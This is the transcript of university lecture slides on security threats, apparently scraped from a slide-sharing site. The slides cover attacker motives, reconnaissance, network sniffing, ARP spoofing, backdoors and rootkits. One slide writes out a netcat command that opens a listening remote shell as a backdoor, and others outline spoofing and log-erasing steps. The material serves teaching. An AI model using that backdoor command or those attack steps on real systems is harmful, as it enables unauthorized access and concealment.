coen 252
Skip this Video
Download Presentation
COEN 252

Loading in 2 Seconds...

play fullscreen
1 / 44

COEN 252 - PowerPoint PPT Presentation

  • Uploaded on

Hacking. Untargeted attacksMotivation isFun (I can do it)prevalent until ~2000Financial GainSelling access to compute resourcesCreation of botnets for spamming, computation (distributed decryption, phishing, pharming ?) Selling dataCredit Card InformationE-mails?Targeted Denial of Service

I am the owner, or an agent authorized to act on behalf of the owner, of the copyrighted work described.
Download Presentation

PowerPoint Slideshow about 'COEN 252' - ziven

An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.

- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -
Presentation Transcript
coen 252

COEN 252

Security Threats

  • Untargeted attacks
    • Motivation is
      • Fun (I can do it)
        • prevalent until ~2000
      • Financial Gain
        • Selling access to compute resources
          • Creation of botnets for spamming, computation (distributed decryption, phishing, pharming …)
        • Selling data
          • Credit Card Information
          • E-mails
        • Targeted Denial of Service Attacks
          • Cloud Nine, a British ISP failed after suffering attacks
      • Cyber-warfare, terrorism
  • Targeted Attacks
    • Theft of information
    • Incapacitation of an organization to fulfill its purpose by destroying / impeding its use of computing resources

Phases of a Targeted Attack

  • Reconnaissance
  • Scanning
  • Gaining Access
  • Expanding Access
  • Covering Tracks
  • Social Engineering
    • Incite a human to act imprudently, furthering the goals of the attacker:
      • “I cannot access my email. What do I do?”
      • Countermeasures:
        • Identify security issues
        • Develop policies
          • Need to prevent leakage of information
          • Need buy-in by users and agents
          • Need to maintain user-friendliness of IT
  • Physical Reconnaissance
    • Dumpster Diving
      • Especially bountiful when people move
    • Installation of scanning devices
  • Finding publicly available information
    • Contact information of internet registration
      • WhoIs, ARIN, RIPE, …
    • Internal documents made publicly available:
      • Use search engines
      • Check Internet Archive, …
      • Identify naming conventions and guess file names
      • Scrutinize publications
        • A word document might contain the revision history with old versions of file
        • A PDF file had confidential information obscured by a black box, that could be removed
    • Email, Usenet, Blog postings that identify names of internal machines, …
reconnaissance scanning
Reconnaissance: Scanning

Once we have a target, we need to get to know it better.


  • War Dialing (to find out modem access)
  • War Driving
  • Network Mapping
    • Largely obsolete due to better firewall rules
  • Vulnerability Scanning
scanning war dialing
Scanning: War Dialing

Purpose: Find a modem connection.

  • Many users in a company install remote PC software such as PCAnywhere without setting the software up correctly.
  • War Dialer finds these numbers by going through a range of phone numbers listening for a modem.
  • Demon Dialer tries a brute force password attack on a found connection.
  • Typically: war dialing will find an unsecured connection.
scanning network mapping
Scanning: Network Mapping


  • ping is implemented using the Internet Control Message Protocol (ICMP) Echo Request.
  • A receiving station answers back to the sender.
  • Used by system administrators to check status of machines and connections.
scanning network mapping10
Scanning: Network Mapping


  • Pings a system with ICMP echo requests with varying life spans (= # of hops allowed).
  • A system that receives a package with expired numbers of hops sends an error message back to sender.
  • Traceroute uses this to find the route to a given system.
  • Useful for System Administration
scanning network mapping11
Scanning: Network Mapping


Network Scanner

(UNIX based)

(Uses traceroute and other tools to map a network.)

Cheops et Co. are the reason that firewalls intercept pings.

reconnaissance port scans
Reconnaissance: Port Scans
  • Applications on a system use ports to listen for network traffic or send it out.
  • 216 ports available, some for known services such as http (80), ftp, ...
  • Port scans send various type of IP packages to target on different ports.
  • Reaction tells them whether the port is open (an application listens).
reconnaissance nmap
Reconnaissance: Nmap
  • Uses different types of packets to check for open ports.
    • Xmas tree, NULL, Syn, … Scans
  • Can tell from the reaction what OS is running, including patch levels.
  • Can run in stealth mode, in which it is not detected by many firewalls.
reconnaissance prevention
Reconnaissance Prevention
  • Firewalls can make it very difficult to scan from the outside.
    • Drop scan packets.
  • Patched OS do not have idiosyncratic behavior that allows OS determination.
  • IDS can detect internal scans and warn against them.
  • Example: Detect traceroute by not allowing in packets with very small TDL values
gaining access
Gaining Access
  • Fault in Policy
    • Weak or no authentication, unwarranted trust relationships, …
  • Fault in Implementation
    • Typical triggered by intentionally malformed input
  • Extension of a security breach
    • Sniffing malware, …
security policy software defects flaws vulnerabilities
Security Policy, Software defects, flaws, vulnerabilities
  • A Security Policy is a set of rules and practices that specify or regulate how a system or organization provides security services to protect sensitive and critical system resources [Internet Society 00].
  • Software Defects:
    • A software defect is the encoding of a human error into the software, including omissions.
  • Security Flaw:
    • A security flaw is a software defect that poses a potential security risk.
    • Eliminating software defects eliminate security flaws.
  • Vulnerability
    • set of conditions that allows an attacker to violate an explicit or implicit security policy.
    • Not all security flaws lead to vulnerabilities.
    • Not all vulnerabilities are based on a security flaw.
software vulnerabilities
Software Vulnerabilities
  • Attacker needs
    • to control the environment of the application
    • or craft input

in order to trigger a vulnerability.

software vulnerabilities18
Software Vulnerabilities
  • In a typical environment, attacker needs to be able to set a single value at a single address in order to execute arbitrary code.
  • Typical Targets
    • Global Offset Table in Unix
      • Used to link to library functions
    • .dtors
      • Used by gcc to link to destructors that run at termination of program
    • Virtual Function Tables
    • Exception Handling Table in Windows
software vulnerabilities19
Software Vulnerabilities
  • Typical Vulnerabilities
    • Buffer Overruns:
      • Input string is stored on a buffer, but buffer is too small
      • Input located outside of buffer has overwritten data
      • Stack based buffer overflow: Overwrite the return address of a function
    • Format String Vulnerability: (Specific to C)
      • Arises by not specifying a format string
      • The %n construct allows attacker to control a random memory location
    • Integer Overflow
    • Race Conditions
      • Especially when accessing files
software vulnerabilities20
Software Vulnerabilities
  • Typical Vulnerabilities
    • Injection Attacks
      • Input (e.g. user input to web server) is used to generate arguments for a command to be executed: Command Injection
      • Input (e.g. user input to web server) is used to generate arguments for a sql query to be executed and displayed: SQL Injection
    • Name Resolution Attacks
      • Different modules use different ways to canonicalize / resolve names of resources such as files
        • HFS2 file names are not case sensitive, but Apache configuration is
        • Homonyms (e.g. kyrillic vs. regular o)
software vulnerabilities21
Software Vulnerabilities
  • Use of magic names
    • Instance of security by obfuscation
      • Magic URL
      • Hidden Form Fields
software vulnerabilities22
Software Vulnerabilities
  • False amount of security information results in poor usability
    • Too many warnings: Users are confused and trained to ignore warnings
    • Too few warnings: Users are not made aware of risks
  • Bad networking protocols
    • Unauthenticated key exchange
    • Trusting network name resolution
gaining access through network attacks sniffing
Gaining Access through Network Attacks: Sniffing
  • Sniffer: Gathers traffic from a LAN.
  • Examples: Snort, Sniffit
  • To gain access to packages, use spoofed ARP (Address Resolution Protocol) to reroute traffic.
gaining access through network attacks sniffing24
Gaining Access through Network Attacks: Sniffing
  • Sniffing through a hub:
    • MAC flooding:
      • Switches store MAC addresses in a cache.
      • Switches accept MAC advertising.
      • Attacker sends a flood of MAC advertisings.
      • Switch’s cache fills up.
      • Switch moves into promiscuous mode.
    • Spoofed ARP messages
gaining access through network attacks sniffing25
Gaining Access through Network Attacks: Sniffing
  • Sniffing through a hub:
    • Spoofed ARP messages:
      • ARP resolves between IP addresses and MAC addresses.
      • Step 1: Attacker sets up IP Forwarding to the default router on LAN.
      • Step 2: Send a faked ARP reply to victims machine to reroute default router IP to attackers MAC address.
      • Step 3: Victim sends out a message to the outside world. This is routed to the default router IP, i.e. to the attackers machine.
      • Step 4: Attacker reads traffic.
      • Step 5: Because of forwarding, packet is forwarded to actual default router.
gaining access through network attacks sniffing26
Gaining Access through Network Attacks: Sniffing
  • Man in the Middle Attack with DSniff:
    • Step 1: Send fake DNS response with IP address for the web site to be attacked to the victim.
    • Step 2: Victim connects to website.
    • Step 3: DNS resolves to the attacker’s machine, request send there.
    • Step 4: Attacker’s site receives request, acts as proxy, forwards it to real website.
    • Step 5: Real website answers, attackers site forwards to victim.
gaining access session hijacking
Gaining Access: Session Hijacking
  • IP Address Spoofing: Send out IP packages with false IP addresses.
  • If an attacker sits on a link through which traffic between two sites flows, the attacker can inject spoofed packages to “hijack the session”.
  • Attacker inserts commands into the connection.
  • Details omitted.
exploiting and maintaining address
Exploiting and Maintaining Address

After successful intrusion, an attacker should:

  • Attack privileged programs to gain root or administrator privileges.
  • Erase traces (e.g. change log entries).
  • Take measures to maintain access.
  • Erase security holes so that no-one else can gain illicit access and do something stupid to wake up the sys. ad.
maintaining access trojans
Maintaining Access: Trojans
  • A program with an additional, evil payload.
    • Running MS Word also reinstalls a backdoor.
    • ps does not display the installed sniffer.
maintaining access backdoors
Maintaining Access: Backdoors
  • Bypass normal security measures.

Example: netcat

  • Install netcat on victim with the GAPING_SECURITY_HOLE option.

C:\ nc -1 –p 12345 –e

  • In the future: connect to port 12345 and start typing commands.
maintaining access backdoors31
Maintaining Access: Backdoors
  • BO2K (Back Orifice 2000) runs in stealth mode (you cannot discover it by looking at the processes tab in the TASK MANAGER.
  • Otherwise, it is a remote control program like pcAnyWhere, that allows accessing a computer over the net.
maintaining access backdoors32
Maintaining Access: Backdoors
  • RootKit:

A backdoor built as a Trojan of system executables such as ipconfig.

  • Kernel-Level RootKit:

Changes the OS, not only system executables.

covering tracks
Covering Tracks:
  • Altering logs.
  • Create difficult to find files and directories.
  • Covert Channels through Networks:
    • Loki uses ICMP messages as the carrier.
    • Use WWW traffic.
    • Use unused fields in TCP/IP headers.
  • Use antiforensics
    • Change registry values to delete traces of installed programs
    • Change Date-Time stamps
hacker profile
Hacker Profile
  • Internal Hacker
    • Disgruntled employee
    • Contracted employee
      • Targets for corporate espionage.
      • Are not bound by employee policies and procedures.
    • Indirectly contracted employee
      • Perform shared or subcontracted services
hacker profile35
Hacker Profile
  • External Hacker
    • Recreational Hacker
      • 85% 90% male.
      • Between 12 and 25.
      • Highly intelligent low-achiever.
      • Typically from dysfunctional families.
    • Professional Hacker
      • Hackers for hire.
      • Electronic warfare, corporate espionage.
      • So-called “Security Consultants” who look for blackmail or exploit for hire
      • Security Consultants
hacker profile36
Hacker Profile
  • Virus writers1
    • Teenagers, College Students, Professionals
    • Drop out of the scene as adults or have social problems.
    • Intelligent, educated, male.

Study by Sarah Gordon, IBM, in Beiser, Vince, “Inside the Virus Writer’s Mind”

hacker profile37
Hacker Profile
  • Script Kiddy
    • Uses scripts of programs written by others to exploit known vulnerabilities
    • Goal is bragging rights, defacing web sites
    • Sweep IP addresses for vulnerability
    • Typically not explicitly malicious, but can cause damage inadvertently
hacker profile38
Hacker Profile
  • Dedicated Hacker
    • Does research.
    • Knows in and outs of OS, system, auditing and security tools.
    • Writes or modifies programs and shell scripts
    • Reads security bulletins (CERT, NIST)
    • Searches the underground.
hacker profile39
Hacker Profile
  • Skilled Hacker
    • Thorough understanding of system at the level of Sys Ad or above.
    • Can read OS source code.
    • Understands network protocols.
  • Superhacker
    • Does not brag or post.
    • Can enter or bring down any system.

hacker motives
Hacker Motives
  • Intellectually Motivated
    • Educational experimentation
      • 28 year old computer expert diverted 2585 US West computers to search for a new prime number.
      • Used 10.63 years of computer time.
      • Lengthened telephone number lookup to 5 minutes
      • Almost shut down the Phoenix Service Delivery Center
    • “Harmless Fun”
      • Web defacing
    • Wake-up Call
      • Free-lance security consultant (still illegal)
hacker motives41
Hacker Motives
  • Personally motivated
    • Disgruntled employee.
    • Cyber-stalking
      • E.g. to show of superiority to someone they feel / are inferior to.
      • Danger of escalation to physical attack.
        • A 50-year old security guard used the internet to solicit the rape of a 28-year old woman who rejected him.
        • Impersonated her in chat rooms and online bulletins.
        • Impersonated rape fantasies.
        • At least six man knocked at her door at night offering to rape her.
        • Six years in prison.
hacker motives42
Hacker Motives
  • Socially motivated
    • Cyber-activism
    • Politically motivated
      • Hacking KKK or NAACP websites
    • Cyber-Terrorism
      • Threatens serious disruption of the infrastructure
        • Power
        • Water
        • Transportation
        • Communication
      • 1988: Israeli Virus and logic bomb in Israeli government computers
    • Cyber-warfare
hacker motives43
Hacker Motives
  • Financially Motivated
    • Personal profit.
      • Two Cisco Systems consultants issued almost $8 M Cisco stock to themselves.
      • Accessed a system used to manage stock option disbursals to find control numbers for forged authorization forms.
    • Damage to the organization.
      • British internet provider, Cloud Nine, went out of business after crippling series of DOS attacks.
  • Ego Motivated
hacking damage
Hacking Damage
  • Releasing Information
  • Releasing Software
    • By circumventing copying protection.
    • Through IP theft
  • Consuming Unused(?) Resources
  • Discover and Document Vulnerabilities
  • Compromise Systems and Increase their Vulnerabilities
  • Website Vandalism